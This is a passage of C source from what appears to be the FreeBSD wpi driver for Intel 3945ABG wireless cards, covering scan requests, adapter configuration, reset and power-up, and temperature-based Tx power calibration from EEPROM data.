HC_QOS_SUPPORT_ASSOC + HC_IBSS_START */ DPRINTF(("config chan %d flags %x\n", sc->config.chan, sc->config.flags)); error = wpi_cmd(sc, WPI_CMD_CONFIGURE, &sc->config, sizeof (struct wpi_config), 1); if (error != 0) { device_printf(sc->sc_dev, "could not update configuration\n"); return error; } error = wpi_set_txpower(sc, ni->ni_chan, 1); if (error != 0) { device_printf(sc->sc_dev, "could set txpower\n"); return error; } /* link LED always on while associated */ wpi_set_led(sc, WPI_LED_LINK, 0, 1); /* start automatic rate control timer */ callout_reset(&sc->calib_to, 60*hz, wpi_calib_timeout, sc); return (error); } /* * Send a scan request to the firmware. Since this command is huge, we map it * into a mbufcluster instead of using the pre-allocated set of commands. Note, * much of this code is similar to that in wpi_cmd but because we must manually * construct the probe & channels, we duplicate what's needed here. XXX In the * future, this function should be modified to use wpi_cmd to help cleanup the * code base. */ static int wpi_scan(struct wpi_softc *sc) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct ieee80211_scan_state *ss = ic->ic_scan; struct wpi_tx_ring *ring = &sc->cmdq; struct wpi_tx_desc *desc; struct wpi_tx_data *data; struct wpi_tx_cmd *cmd; struct wpi_scan_hdr *hdr; struct wpi_scan_chan *chan; struct ieee80211_frame *wh; struct ieee80211_rateset *rs; struct ieee80211_channel *c; enum ieee80211_phymode mode; uint8_t *frm; int nrates, pktlen, error, i, nssid; bus_addr_t physaddr; desc = &ring->desc[ring->cur]; data = &ring->data[ring->cur]; data->m = m_getcl(M_NOWAIT, MT_DATA, M_PKTHDR); if (data->m == NULL) { device_printf(sc->sc_dev, "could not allocate mbuf for scan command\n"); return ENOMEM; } cmd = mtod(data->m, struct wpi_tx_cmd *); cmd->code = WPI_CMD_SCAN; cmd->flags = 0; cmd->qid = ring->qid; cmd->idx = ring->cur; hdr = (struct wpi_scan_hdr *)cmd->data; memset(hdr, 0, sizeof(struct wpi_scan_hdr)); /* * Move to the next channel if no packets are received within 5 msecs * after sending the probe request (this helps to reduce the duration * of active scans). 
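 * The command is laid out as: scan header, up to four ESSID entries, a
 * probe request frame template, then one wpi_scan_chan entry per
 * channel; hdr->tx.len covers just the probe frame and hdr->len the
 * whole command, both computed from the running "frm" pointer.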
*/ hdr->quiet = htole16(5); hdr->threshold = htole16(1); if (IEEE80211_IS_CHAN_A(ic->ic_curchan)) { /* send probe requests at 6Mbps */ hdr->tx.rate = wpi_ridx_to_plcp[WPI_OFDM6]; /* Enable crc checking */ hdr->promotion = htole16(1); } else { hdr->flags = htole32(WPI_CONFIG_24GHZ | WPI_CONFIG_AUTO); /* send probe requests at 1Mbps */ hdr->tx.rate = wpi_ridx_to_plcp[WPI_CCK1]; } hdr->tx.id = WPI_ID_BROADCAST; hdr->tx.lifetime = htole32(WPI_LIFETIME_INFINITE); hdr->tx.flags = htole32(WPI_TX_AUTO_SEQ); memset(hdr->scan_essids, 0, sizeof(hdr->scan_essids)); nssid = MIN(ss->ss_nssid, WPI_SCAN_MAX_ESSIDS); for (i = 0; i < nssid; i++) { hdr->scan_essids[i].id = IEEE80211_ELEMID_SSID; hdr->scan_essids[i].esslen = MIN(ss->ss_ssid[i].len, 32); memcpy(hdr->scan_essids[i].essid, ss->ss_ssid[i].ssid, hdr->scan_essids[i].esslen); #ifdef WPI_DEBUG if (wpi_debug & WPI_DEBUG_SCANNING) { printf("Scanning Essid: "); ieee80211_print_essid(hdr->scan_essids[i].essid, hdr->scan_essids[i].esslen); printf("\n"); } #endif } /* * Build a probe request frame. Most of the following code is a * copy & paste of what is done in net80211. */ wh = (struct ieee80211_frame *)&hdr->scan_essids[4]; wh->i_fc[0] = IEEE80211_FC0_VERSION_0 | IEEE80211_FC0_TYPE_MGT | IEEE80211_FC0_SUBTYPE_PROBE_REQ; wh->i_fc[1] = IEEE80211_FC1_DIR_NODS; IEEE80211_ADDR_COPY(wh->i_addr1, ifp->if_broadcastaddr); IEEE80211_ADDR_COPY(wh->i_addr2, IF_LLADDR(ifp)); IEEE80211_ADDR_COPY(wh->i_addr3, ifp->if_broadcastaddr); *(u_int16_t *)&wh->i_dur[0] = 0; /* filled by h/w */ *(u_int16_t *)&wh->i_seq[0] = 0; /* filled by h/w */ frm = (uint8_t *)(wh + 1); /* add essid IE, the hardware will fill this in for us */ *frm++ = IEEE80211_ELEMID_SSID; *frm++ = 0; mode = ieee80211_chan2mode(ic->ic_curchan); rs = &ic->ic_sup_rates[mode]; /* add supported rates IE */ *frm++ = IEEE80211_ELEMID_RATES; nrates = rs->rs_nrates; if (nrates > IEEE80211_RATE_SIZE) nrates = IEEE80211_RATE_SIZE; *frm++ = nrates; memcpy(frm, rs->rs_rates, nrates); frm += nrates; /* add supported xrates IE */ if (rs->rs_nrates > IEEE80211_RATE_SIZE) { nrates = rs->rs_nrates - IEEE80211_RATE_SIZE; *frm++ = IEEE80211_ELEMID_XRATES; *frm++ = nrates; memcpy(frm, rs->rs_rates + IEEE80211_RATE_SIZE, nrates); frm += nrates; } /* setup length of probe request */ hdr->tx.len = htole16(frm - (uint8_t *)wh); /* * Construct information about the channel that we * want to scan. The firmware expects this to be directly * after the scan probe request */ c = ic->ic_curchan; chan = (struct wpi_scan_chan *)frm; chan->chan = ieee80211_chan2ieee(ic, c); chan->flags = 0; if (!(c->ic_flags & IEEE80211_CHAN_PASSIVE)) { chan->flags |= WPI_CHAN_ACTIVE; if (nssid != 0) chan->flags |= WPI_CHAN_DIRECT; } chan->gain_dsp = 0x6e; /* Default level */ if (IEEE80211_IS_CHAN_5GHZ(c)) { chan->active = htole16(10); chan->passive = htole16(ss->ss_maxdwell); chan->gain_radio = 0x3b; } else { chan->active = htole16(20); chan->passive = htole16(ss->ss_maxdwell); chan->gain_radio = 0x28; } DPRINTFN(WPI_DEBUG_SCANNING, ("Scanning %u Passive: %d\n", chan->chan, c->ic_flags & IEEE80211_CHAN_PASSIVE)); hdr->nchan++; chan++; frm += sizeof (struct wpi_scan_chan); #if 0 // XXX All Channels.... 
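/*
 * Disabled: this variant walked every channel compatible with the
 * current channel's flags and appended a wpi_scan_chan entry for each.
 * The active code above builds an entry for ic_curchan only and relies
 * on net80211 to advance the scan one channel at a time
 * (wpi_scan_curchan() per channel, ieee80211_scan_next() when the
 * firmware reports WPI_STOP_SCAN).
 */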
for (c = &ic->ic_channels[1]; c <= &ic->ic_channels[IEEE80211_CHAN_MAX]; c++) { if ((c->ic_flags & ic->ic_curchan->ic_flags) != ic->ic_curchan->ic_flags) continue; chan->chan = ieee80211_chan2ieee(ic, c); chan->flags = 0; if (!(c->ic_flags & IEEE80211_CHAN_PASSIVE)) { chan->flags |= WPI_CHAN_ACTIVE; if (ic->ic_des_ssid[0].len != 0) chan->flags |= WPI_CHAN_DIRECT; } chan->gain_dsp = 0x6e; /* Default level */ if (IEEE80211_IS_CHAN_5GHZ(c)) { chan->active = htole16(10); chan->passive = htole16(110); chan->gain_radio = 0x3b; } else { chan->active = htole16(20); chan->passive = htole16(120); chan->gain_radio = 0x28; } DPRINTFN(WPI_DEBUG_SCANNING, ("Scanning %u Passive: %d\n", chan->chan, c->ic_flags & IEEE80211_CHAN_PASSIVE)); hdr->nchan++; chan++; frm += sizeof (struct wpi_scan_chan); } #endif hdr->len = htole16(frm - (uint8_t *)hdr); pktlen = frm - (uint8_t *)cmd; error = bus_dmamap_load(ring->data_dmat, data->map, cmd, pktlen, wpi_dma_map_addr, &physaddr, BUS_DMA_NOWAIT); if (error != 0) { device_printf(sc->sc_dev, "could not map scan command\n"); m_freem(data->m); data->m = NULL; return error; } desc->flags = htole32(WPI_PAD32(pktlen) << 28 | 1 << 24); desc->segs[0].addr = htole32(physaddr); desc->segs[0].len = htole32(pktlen); bus_dmamap_sync(ring->desc_dma.tag, ring->desc_dma.map, BUS_DMASYNC_PREWRITE); bus_dmamap_sync(ring->data_dmat, data->map, BUS_DMASYNC_PREWRITE); /* kick cmd ring */ ring->cur = (ring->cur + 1) % WPI_CMD_RING_COUNT; WPI_WRITE(sc, WPI_TX_WIDX, ring->qid << 8 | ring->cur); sc->sc_scan_timer = 5; return 0; /* will be notified async. of failure/success */ } /** * Configure the card to listen to a particular channel, this transisions the * card in to being able to receive frames from remote devices. */ static int wpi_config(struct wpi_softc *sc) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct wpi_power power; struct wpi_bluetooth bluetooth; struct wpi_node_info node; int error; /* set power mode */ memset(&power, 0, sizeof power); power.flags = htole32(WPI_POWER_CAM|0x8); error = wpi_cmd(sc, WPI_CMD_SET_POWER_MODE, &power, sizeof power, 0); if (error != 0) { device_printf(sc->sc_dev, "could not set power mode\n"); return error; } /* configure bluetooth coexistence */ memset(&bluetooth, 0, sizeof bluetooth); bluetooth.flags = 3; bluetooth.lead = 0xaa; bluetooth.kill = 1; error = wpi_cmd(sc, WPI_CMD_BLUETOOTH, &bluetooth, sizeof bluetooth, 0); if (error != 0) { device_printf(sc->sc_dev, "could not configure bluetooth coexistence\n"); return error; } /* configure adapter */ memset(&sc->config, 0, sizeof (struct wpi_config)); IEEE80211_ADDR_COPY(sc->config.myaddr, IF_LLADDR(ifp)); /*set default channel*/ sc->config.chan = htole16(ieee80211_chan2ieee(ic, ic->ic_curchan)); sc->config.flags = htole32(WPI_CONFIG_TSF); if (IEEE80211_IS_CHAN_2GHZ(ic->ic_curchan)) { sc->config.flags |= htole32(WPI_CONFIG_AUTO | WPI_CONFIG_24GHZ); } sc->config.filter = 0; switch (ic->ic_opmode) { case IEEE80211_M_STA: case IEEE80211_M_WDS: /* No know setup, use STA for now */ sc->config.mode = WPI_MODE_STA; sc->config.filter |= htole32(WPI_FILTER_MULTICAST); break; case IEEE80211_M_IBSS: case IEEE80211_M_AHDEMO: sc->config.mode = WPI_MODE_IBSS; sc->config.filter |= htole32(WPI_FILTER_BEACON | WPI_FILTER_MULTICAST); break; case IEEE80211_M_HOSTAP: sc->config.mode = WPI_MODE_HOSTAP; break; case IEEE80211_M_MONITOR: sc->config.mode = WPI_MODE_MONITOR; sc->config.filter |= htole32(WPI_FILTER_MULTICAST | WPI_FILTER_CTL | WPI_FILTER_PROMISC); break; default: 
device_printf(sc->sc_dev, "unknown opmode %d\n", ic->ic_opmode); return EINVAL; } sc->config.cck_mask = 0x0f; /* not yet negotiated */ sc->config.ofdm_mask = 0xff; /* not yet negotiated */ error = wpi_cmd(sc, WPI_CMD_CONFIGURE, &sc->config, sizeof (struct wpi_config), 0); if (error != 0) { device_printf(sc->sc_dev, "configure command failed\n"); return error; } /* configuration has changed, set Tx power accordingly */ if ((error = wpi_set_txpower(sc, ic->ic_curchan, 0)) != 0) { device_printf(sc->sc_dev, "could not set Tx power\n"); return error; } /* add broadcast node */ memset(&node, 0, sizeof node); IEEE80211_ADDR_COPY(node.bssid, ifp->if_broadcastaddr); node.id = WPI_ID_BROADCAST; node.rate = wpi_plcp_signal(2); error = wpi_cmd(sc, WPI_CMD_ADD_NODE, &node, sizeof node, 0); if (error != 0) { device_printf(sc->sc_dev, "could not add broadcast node\n"); return error; } /* Setup rate scalling */ error = wpi_mrr_setup(sc); if (error != 0) { device_printf(sc->sc_dev, "could not setup MRR\n"); return error; } return 0; } static void wpi_stop_master(struct wpi_softc *sc) { uint32_t tmp; int ntries; DPRINTFN(WPI_DEBUG_HW,("Disabling Firmware execution\n")); tmp = WPI_READ(sc, WPI_RESET); WPI_WRITE(sc, WPI_RESET, tmp | WPI_STOP_MASTER | WPI_NEVO_RESET); tmp = WPI_READ(sc, WPI_GPIO_CTL); if ((tmp & WPI_GPIO_PWR_STATUS) == WPI_GPIO_PWR_SLEEP) return; /* already asleep */ for (ntries = 0; ntries < 100; ntries++) { if (WPI_READ(sc, WPI_RESET) & WPI_MASTER_DISABLED) break; DELAY(10); } if (ntries == 100) { device_printf(sc->sc_dev, "timeout waiting for master\n"); } } static int wpi_power_up(struct wpi_softc *sc) { uint32_t tmp; int ntries; wpi_mem_lock(sc); tmp = wpi_mem_read(sc, WPI_MEM_POWER); wpi_mem_write(sc, WPI_MEM_POWER, tmp & ~0x03000000); wpi_mem_unlock(sc); for (ntries = 0; ntries < 5000; ntries++) { if (WPI_READ(sc, WPI_GPIO_STATUS) & WPI_POWERED) break; DELAY(10); } if (ntries == 5000) { device_printf(sc->sc_dev, "timeout waiting for NIC to power up\n"); return ETIMEDOUT; } return 0; } static int wpi_reset(struct wpi_softc *sc) { uint32_t tmp; int ntries; DPRINTFN(WPI_DEBUG_HW, ("Resetting the card - clearing any uploaded firmware\n")); /* clear any pending interrupts */ WPI_WRITE(sc, WPI_INTR, 0xffffffff); tmp = WPI_READ(sc, WPI_PLL_CTL); WPI_WRITE(sc, WPI_PLL_CTL, tmp | WPI_PLL_INIT); tmp = WPI_READ(sc, WPI_CHICKEN); WPI_WRITE(sc, WPI_CHICKEN, tmp | WPI_CHICKEN_RXNOLOS); tmp = WPI_READ(sc, WPI_GPIO_CTL); WPI_WRITE(sc, WPI_GPIO_CTL, tmp | WPI_GPIO_INIT); /* wait for clock stabilization */ for (ntries = 0; ntries < 25000; ntries++) { if (WPI_READ(sc, WPI_GPIO_CTL) & WPI_GPIO_CLOCK) break; DELAY(10); } if (ntries == 25000) { device_printf(sc->sc_dev, "timeout waiting for clock stabilization\n"); return ETIMEDOUT; } /* initialize EEPROM */ tmp = WPI_READ(sc, WPI_EEPROM_STATUS); if ((tmp & WPI_EEPROM_VERSION) == 0) { device_printf(sc->sc_dev, "EEPROM not found\n"); return EIO; } WPI_WRITE(sc, WPI_EEPROM_STATUS, tmp & ~WPI_EEPROM_LOCKED); return 0; } static void wpi_hw_config(struct wpi_softc *sc) { uint32_t rev, hw; /* voodoo from the Linux "driver".. 
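 * The PCI revision and the EEPROM capability/revision/type words read
 * earlier select the board variant bits (ALM_MB/ALM_MM, SKU_MRC, REV_D,
 * TYPE_B) written into WPI_HWCONFIG.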
*/ hw = WPI_READ(sc, WPI_HWCONFIG); rev = pci_read_config(sc->sc_dev, PCIR_REVID, 1); if ((rev & 0xc0) == 0x40) hw |= WPI_HW_ALM_MB; else if (!(rev & 0x80)) hw |= WPI_HW_ALM_MM; if (sc->cap == 0x80) hw |= WPI_HW_SKU_MRC; hw &= ~WPI_HW_REV_D; if ((le16toh(sc->rev) & 0xf0) == 0xd0) hw |= WPI_HW_REV_D; if (sc->type > 1) hw |= WPI_HW_TYPE_B; WPI_WRITE(sc, WPI_HWCONFIG, hw); } static void wpi_rfkill_resume(struct wpi_softc *sc) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct ieee80211vap *vap = TAILQ_FIRST(&ic->ic_vaps); int ntries; /* enable firmware again */ WPI_WRITE(sc, WPI_UCODE_CLR, WPI_RADIO_OFF); WPI_WRITE(sc, WPI_UCODE_CLR, WPI_DISABLE_CMD); /* wait for thermal sensors to calibrate */ for (ntries = 0; ntries < 1000; ntries++) { if ((sc->temp = (int)WPI_READ(sc, WPI_TEMPERATURE)) != 0) break; DELAY(10); } if (ntries == 1000) { device_printf(sc->sc_dev, "timeout waiting for thermal calibration\n"); return; } DPRINTFN(WPI_DEBUG_TEMP,("temperature %d\n", sc->temp)); if (wpi_config(sc) != 0) { device_printf(sc->sc_dev, "device config failed\n"); return; } ifp->if_drv_flags &= ~IFF_DRV_OACTIVE; ifp->if_drv_flags |= IFF_DRV_RUNNING; sc->flags &= ~WPI_FLAG_HW_RADIO_OFF; if (vap != NULL) { if ((ic->ic_flags & IEEE80211_F_SCAN) == 0) { if (vap->iv_opmode != IEEE80211_M_MONITOR) { ieee80211_beacon_miss(ic); wpi_set_led(sc, WPI_LED_LINK, 0, 1); } else wpi_set_led(sc, WPI_LED_LINK, 5, 5); } else { ieee80211_scan_next(vap); wpi_set_led(sc, WPI_LED_LINK, 20, 2); } } callout_reset(&sc->watchdog_to, hz, wpi_watchdog, sc); } static void wpi_init_locked(struct wpi_softc *sc, int force) { struct ifnet *ifp = sc->sc_ifp; uint32_t tmp; int ntries, qid; wpi_stop_locked(sc); (void)wpi_reset(sc); wpi_mem_lock(sc); wpi_mem_write(sc, WPI_MEM_CLOCK1, 0xa00); DELAY(20); tmp = wpi_mem_read(sc, WPI_MEM_PCIDEV); wpi_mem_write(sc, WPI_MEM_PCIDEV, tmp | 0x800); wpi_mem_unlock(sc); (void)wpi_power_up(sc); wpi_hw_config(sc); /* init Rx ring */ wpi_mem_lock(sc); WPI_WRITE(sc, WPI_RX_BASE, sc->rxq.desc_dma.paddr); WPI_WRITE(sc, WPI_RX_RIDX_PTR, sc->shared_dma.paddr + offsetof(struct wpi_shared, next)); WPI_WRITE(sc, WPI_RX_WIDX, (WPI_RX_RING_COUNT - 1) & ~7); WPI_WRITE(sc, WPI_RX_CONFIG, 0xa9601010); wpi_mem_unlock(sc); /* init Tx rings */ wpi_mem_lock(sc); wpi_mem_write(sc, WPI_MEM_MODE, 2); /* bypass mode */ wpi_mem_write(sc, WPI_MEM_RA, 1); /* enable RA0 */ wpi_mem_write(sc, WPI_MEM_TXCFG, 0x3f); /* enable all 6 Tx rings */ wpi_mem_write(sc, WPI_MEM_BYPASS1, 0x10000); wpi_mem_write(sc, WPI_MEM_BYPASS2, 0x30002); wpi_mem_write(sc, WPI_MEM_MAGIC4, 4); wpi_mem_write(sc, WPI_MEM_MAGIC5, 5); WPI_WRITE(sc, WPI_TX_BASE_PTR, sc->shared_dma.paddr); WPI_WRITE(sc, WPI_MSG_CONFIG, 0xffff05a5); for (qid = 0; qid < 6; qid++) { WPI_WRITE(sc, WPI_TX_CTL(qid), 0); WPI_WRITE(sc, WPI_TX_BASE(qid), 0); WPI_WRITE(sc, WPI_TX_CONFIG(qid), 0x80200008); } wpi_mem_unlock(sc); /* clear "radio off" and "disable command" bits (reversed logic) */ WPI_WRITE(sc, WPI_UCODE_CLR, WPI_RADIO_OFF); WPI_WRITE(sc, WPI_UCODE_CLR, WPI_DISABLE_CMD); sc->flags &= ~WPI_FLAG_HW_RADIO_OFF; /* clear any pending interrupts */ WPI_WRITE(sc, WPI_INTR, 0xffffffff); /* enable interrupts */ WPI_WRITE(sc, WPI_MASK, WPI_INTR_MASK); WPI_WRITE(sc, WPI_UCODE_CLR, WPI_RADIO_OFF); WPI_WRITE(sc, WPI_UCODE_CLR, WPI_RADIO_OFF); if ((wpi_load_firmware(sc)) != 0) { device_printf(sc->sc_dev, "A problem occurred loading the firmware to the driver\n"); return; } /* At this point the firmware is up and running. 
If the hardware * RF switch is turned off thermal calibration will fail, though * the card is still happy to continue to accept commands, catch * this case and schedule a task to watch for it to be turned on. */ wpi_mem_lock(sc); tmp = wpi_mem_read(sc, WPI_MEM_HW_RADIO_OFF); wpi_mem_unlock(sc); if (!(tmp & 0x1)) { sc->flags |= WPI_FLAG_HW_RADIO_OFF; device_printf(sc->sc_dev,"Radio Transmitter is switched off\n"); goto out; } /* wait for thermal sensors to calibrate */ for (ntries = 0; ntries < 1000; ntries++) { if ((sc->temp = (int)WPI_READ(sc, WPI_TEMPERATURE)) != 0) break; DELAY(10); } if (ntries == 1000) { device_printf(sc->sc_dev, "timeout waiting for thermal sensors calibration\n"); return; } DPRINTFN(WPI_DEBUG_TEMP,("temperature %d\n", sc->temp)); if (wpi_config(sc) != 0) { device_printf(sc->sc_dev, "device config failed\n"); return; } ifp->if_drv_flags &= ~IFF_DRV_OACTIVE; ifp->if_drv_flags |= IFF_DRV_RUNNING; out: callout_reset(&sc->watchdog_to, hz, wpi_watchdog, sc); } static void wpi_init(void *arg) { struct wpi_softc *sc = arg; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; WPI_LOCK(sc); wpi_init_locked(sc, 0); WPI_UNLOCK(sc); if (ifp->if_drv_flags & IFF_DRV_RUNNING) ieee80211_start_all(ic); /* start all vaps */ } static void wpi_stop_locked(struct wpi_softc *sc) { struct ifnet *ifp = sc->sc_ifp; uint32_t tmp; int ac; sc->sc_tx_timer = 0; sc->sc_scan_timer = 0; ifp->if_drv_flags &= ~(IFF_DRV_RUNNING | IFF_DRV_OACTIVE); sc->flags &= ~WPI_FLAG_HW_RADIO_OFF; callout_stop(&sc->watchdog_to); callout_stop(&sc->calib_to); /* disable interrupts */ WPI_WRITE(sc, WPI_MASK, 0); WPI_WRITE(sc, WPI_INTR, WPI_INTR_MASK); WPI_WRITE(sc, WPI_INTR_STATUS, 0xff); WPI_WRITE(sc, WPI_INTR_STATUS, 0x00070000); wpi_mem_lock(sc); wpi_mem_write(sc, WPI_MEM_MODE, 0); wpi_mem_unlock(sc); /* reset all Tx rings */ for (ac = 0; ac < 4; ac++) wpi_reset_tx_ring(sc, &sc->txq[ac]); wpi_reset_tx_ring(sc, &sc->cmdq); /* reset Rx ring */ wpi_reset_rx_ring(sc, &sc->rxq); wpi_mem_lock(sc); wpi_mem_write(sc, WPI_MEM_CLOCK2, 0x200); wpi_mem_unlock(sc); DELAY(5); wpi_stop_master(sc); tmp = WPI_READ(sc, WPI_RESET); WPI_WRITE(sc, WPI_RESET, tmp | WPI_SW_RESET); sc->flags &= ~WPI_FLAG_BUSY; } static void wpi_stop(struct wpi_softc *sc) { WPI_LOCK(sc); wpi_stop_locked(sc); WPI_UNLOCK(sc); } static void wpi_calib_timeout(void *arg) { struct wpi_softc *sc = arg; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct ieee80211vap *vap = TAILQ_FIRST(&ic->ic_vaps); int temp; if (vap->iv_state != IEEE80211_S_RUN) return; /* update sensor data */ temp = (int)WPI_READ(sc, WPI_TEMPERATURE); DPRINTFN(WPI_DEBUG_TEMP,("Temp in calibration is: %d\n", temp)); wpi_power_calibration(sc, temp); callout_reset(&sc->calib_to, 60*hz, wpi_calib_timeout, sc); } /* * This function is called periodically (every 60 seconds) to adjust output * power to temperature changes. 
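 * A drift of more than 6 units against the last calibration
 * temperature triggers a new TXPOWER command via wpi_set_txpower();
 * smaller changes are ignored.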
*/ static void wpi_power_calibration(struct wpi_softc *sc, int temp) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct ieee80211vap *vap = TAILQ_FIRST(&ic->ic_vaps); /* sanity-check read value */ if (temp < -260 || temp > 25) { /* this can't be correct, ignore */ DPRINTFN(WPI_DEBUG_TEMP, ("out-of-range temperature reported: %d\n", temp)); return; } DPRINTFN(WPI_DEBUG_TEMP,("temperature %d->%d\n", sc->temp, temp)); /* adjust Tx power if need be */ if (abs(temp - sc->temp) <= 6) return; sc->temp = temp; if (wpi_set_txpower(sc, vap->iv_bss->ni_chan, 1) != 0) { /* just warn, too bad for the automatic calibration... */ device_printf(sc->sc_dev,"could not adjust Tx power\n"); } } /** * Read the eeprom to find out what channels are valid for the given * band and update net80211 with what we find. */ static void wpi_read_eeprom_channels(struct wpi_softc *sc, int n) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; const struct wpi_chan_band *band = &wpi_bands[n]; struct wpi_eeprom_chan channels[WPI_MAX_CHAN_PER_BAND]; struct ieee80211_channel *c; int chan, i, passive; wpi_read_prom_data(sc, band->addr, channels, band->nchan * sizeof (struct wpi_eeprom_chan)); for (i = 0; i < band->nchan; i++) { if (!(channels[i].flags & WPI_EEPROM_CHAN_VALID)) { DPRINTFN(WPI_DEBUG_HW, ("Channel Not Valid: %d, band %d\n", band->chan[i],n)); continue; } passive = 0; chan = band->chan[i]; c = &ic->ic_channels[ic->ic_nchans++]; /* is active scan allowed on this channel? */ if (!(channels[i].flags & WPI_EEPROM_CHAN_ACTIVE)) { passive = IEEE80211_CHAN_PASSIVE; } if (n == 0) { /* 2GHz band */ c->ic_ieee = chan; c->ic_freq = ieee80211_ieee2mhz(chan, IEEE80211_CHAN_2GHZ); c->ic_flags = IEEE80211_CHAN_B | passive; c = &ic->ic_channels[ic->ic_nchans++]; c->ic_ieee = chan; c->ic_freq = ieee80211_ieee2mhz(chan, IEEE80211_CHAN_2GHZ); c->ic_flags = IEEE80211_CHAN_G | passive; } else { /* 5GHz band */ /* * Some 3945ABG adapters support channels 7, 8, 11 * and 12 in the 2GHz *and* 5GHz bands. * Because of limitations in our net80211(9) stack, * we can't support these channels in 5GHz band. * XXX not true; just need to map to proper frequency */ if (chan <= 14) continue; c->ic_ieee = chan; c->ic_freq = ieee80211_ieee2mhz(chan, IEEE80211_CHAN_5GHZ); c->ic_flags = IEEE80211_CHAN_A | passive; } /* save maximum allowed power for this channel */ sc->maxpwr[chan] = channels[i].maxpwr; #if 0 // XXX We can probably use this an get rid of maxpwr - ben 20070617 ic->ic_channels[chan].ic_maxpower = channels[i].maxpwr; //ic->ic_channels[chan].ic_minpower... //ic->ic_channels[chan].ic_maxregtxpower... 
#endif DPRINTF(("adding chan %d (%dMHz) flags=0x%x maxpwr=%d" " passive=%d, offset %d\n", chan, c->ic_freq, channels[i].flags, sc->maxpwr[chan], (c->ic_flags & IEEE80211_CHAN_PASSIVE) != 0, ic->ic_nchans)); } } static void wpi_read_eeprom_group(struct wpi_softc *sc, int n) { struct wpi_power_group *group = &sc->groups[n]; struct wpi_eeprom_group rgroup; int i; wpi_read_prom_data(sc, WPI_EEPROM_POWER_GRP + n * 32, &rgroup, sizeof rgroup); /* save power group information */ group->chan = rgroup.chan; group->maxpwr = rgroup.maxpwr; /* temperature at which the samples were taken */ group->temp = (int16_t)le16toh(rgroup.temp); DPRINTF(("power group %d: chan=%d maxpwr=%d temp=%d\n", n, group->chan, group->maxpwr, group->temp)); for (i = 0; i < WPI_SAMPLES_COUNT; i++) { group->samples[i].index = rgroup.samples[i].index; group->samples[i].power = rgroup.samples[i].power; DPRINTF(("\tsample %d: index=%d power=%d\n", i, group->samples[i].index, group->samples[i].power)); } } /* * Update Tx power to match what is defined for channel `c'. */ static int wpi_set_txpower(struct wpi_softc *sc, struct ieee80211_channel *c, int async) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct wpi_power_group *group; struct wpi_cmd_txpower txpower; u_int chan; int i; /* get channel number */ chan = ieee80211_chan2ieee(ic, c); /* find the power group to which this channel belongs */ if (IEEE80211_IS_CHAN_5GHZ(c)) { for (group = &sc->groups[1]; group < &sc->groups[4]; group++) if (chan <= group->chan) break; } else group = &sc->groups[0]; memset(&txpower, 0, sizeof txpower); txpower.band = IEEE80211_IS_CHAN_5GHZ(c) ? 0 : 1; txpower.channel = htole16(chan); /* set Tx power for all OFDM and CCK rates */ for (i = 0; i <= 11 ; i++) { /* retrieve Tx power for this channel/rate combination */ int idx = wpi_get_power_index(sc, group, c, wpi_ridx_to_rate[i]); txpower.rates[i].rate = wpi_ridx_to_plcp[i]; if (IEEE80211_IS_CHAN_5GHZ(c)) { txpower.rates[i].gain_radio = wpi_rf_gain_5ghz[idx]; txpower.rates[i].gain_dsp = wpi_dsp_gain_5ghz[idx]; } else { txpower.rates[i].gain_radio = wpi_rf_gain_2ghz[idx]; txpower.rates[i].gain_dsp = wpi_dsp_gain_2ghz[idx]; } DPRINTFN(WPI_DEBUG_TEMP,("chan %d/rate %d: power index %d\n", chan, wpi_ridx_to_rate[i], idx)); } return wpi_cmd(sc, WPI_CMD_TXPOWER, &txpower, sizeof txpower, async); } /* * Determine Tx power index for a given channel/rate combination. * This takes into account the regulatory information from EEPROM and the * current temperature. */ static int wpi_get_power_index(struct wpi_softc *sc, struct wpi_power_group *group, struct ieee80211_channel *c, int rate) { /* fixed-point arithmetic division using a n-bit fractional part */ #define fdivround(a, b, n) \ ((((1 << n) * (a)) / (b) + (1 << n) / 2) / (1 << n)) /* linear interpolation */ #define interpolate(x, x1, y1, x2, y2, n) \ ((y1) + fdivround(((x) - (x1)) * ((y2) - (y1)), (x2) - (x1), n)) struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct wpi_power_sample *sample; int pwr, idx; u_int chan; /* get channel number */ chan = ieee80211_chan2ieee(ic, c); /* default power is group's maximum power - 3dB */ pwr = group->maxpwr / 2; /* decrease power for highest OFDM rates to reduce distortion */ switch (rate) { case 72: /* 36Mb/s */ pwr -= IEEE80211_IS_CHAN_2GHZ(c) ? 0 : 5; break; case 96: /* 48Mb/s */ pwr -= IEEE80211_IS_CHAN_2GHZ(c) ? 7 : 10; break; case 108: /* 54Mb/s */ pwr -= IEEE80211_IS_CHAN_2GHZ(c) ? 
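/*
 * Worked example for the interpolation further below (illustrative
 * sample values, not from a real EEPROM): with samples
 * (power=40,index=20) and (power=60,index=40), a requested pwr of 50
 * gives 20 + fdivround(10 * 20, 20, 19) = 20 + 10 = 30, i.e. the
 * 19-bit fixed-point rounding reproduces the exact linear result
 * without floating point.
 */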
9 : 12; break; } /* never exceed channel's maximum allowed Tx power */ pwr = min(pwr, sc->maxpwr[chan]); /* retrieve power index into gain tables from samples */ for (sample = group->samples; sample < &group->samples[3]; sample++) if (pwr > sample[1].power) break; /* fixed-point linear interpolation using a 19-bit fractional part */ idx = interpolate(pwr, sample[0].power, sample[0].index, sample[1].power, sample[1].index, 19); /* * Adjust power index based on current temperature * - if colder than factory-calibrated: decreate output power * - if warmer than factory-calibrated: increase output power */ idx -= (sc->temp - group->temp) * 11 / 100; /* decrease power for CCK rates (-5dB) */ if (!WPI_RATE_IS_OFDM(rate)) idx += 10; /* keep power index in a valid range */ if (idx < 0) return 0; if (idx > WPI_MAX_PWR_INDEX) return WPI_MAX_PWR_INDEX; return idx; #undef interpolate #undef fdivround } /** * Called by net80211 framework to indicate that a scan * is starting. This function doesn't actually do the scan, * wpi_scan_curchan starts things off. This function is more * of an early warning from the framework we should get ready * for the scan. */ static void wpi_scan_start(struct ieee80211com *ic) { struct ifnet 